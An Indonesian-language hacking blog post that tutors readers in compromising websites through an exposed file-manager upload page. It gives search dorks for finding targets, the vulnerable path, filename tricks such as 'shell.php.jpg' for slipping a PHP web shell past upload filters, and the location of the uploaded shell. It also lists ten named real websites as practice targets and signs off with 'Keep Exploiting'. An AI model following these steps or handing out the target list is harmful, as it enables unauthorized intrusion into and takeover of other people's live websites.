Sekitar 2.090 hasil (0,50 detik)
Lumayan lah website yang vuln dengan method ini, hehe..
gaisah basa basi lgi. simak baik" ye tutornya, lets cekidoot:
DORK :
- intext:"Website by FirmStudio"
- intext:"Website by FirmStudio" site:.de
EXPLOIT :
site.com/path/include/filemanager/dialog.php
CIRI-CIRI WEB VULN :
CARA UPLOAD SHELL :
- rename shellmu jadi:
1. shell.php.jpg
2. shell.php5
3. shell.php.png
4. shell.php.xxxjpg
5. kreasikan lagi ya, exstensi ini untuk mengbypass supaya bisa upload file.php, karena defaultnya hanya menerima file .html .txt .gif
- Jika sudah di rename. Letak upload file ada sebelah kiri atas sebelah tulisan "Action"
SHELL AKSES :
site.com/uploaded_files/NAMA_SHELLMU
Kalo beruntung nih bisa dapet dir mayan lah, tapi kadang juga Not Writable smua, yg writable cuman file /temp/ doang. Caranya biar bisa akses tuh folder gunain method root server, bisa di googling :)
Buat belajar bisa gunaiin ini :
http://www.hiphing.com.hk/include/filemanager/dialog.php
http://www.cornes.hk/include/filemanager/dialog.php
http://www.jinchuan-intl.com/include/filemanager/dialog.php
http://www.starrhotels.com/include/filemanager/dialog.php
http://www.jewelryshows.org/include/filemanager/dialog.php
http://www.mhh.com.hk/include/filemanager/dialog.php
http://www.metrokitchen.com.hk/include/filemanager/dialog.php
http://www.alisan.com.hk/include/filemanager/dialog.php
http://www.cornesworld.com/include/filemanager/dialog.php
http://www.hairworks.com.hk/include/filemanager/dialog.php
Dah gitu aja ya, semoga bermanfaat :)
Keep Exploiting
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment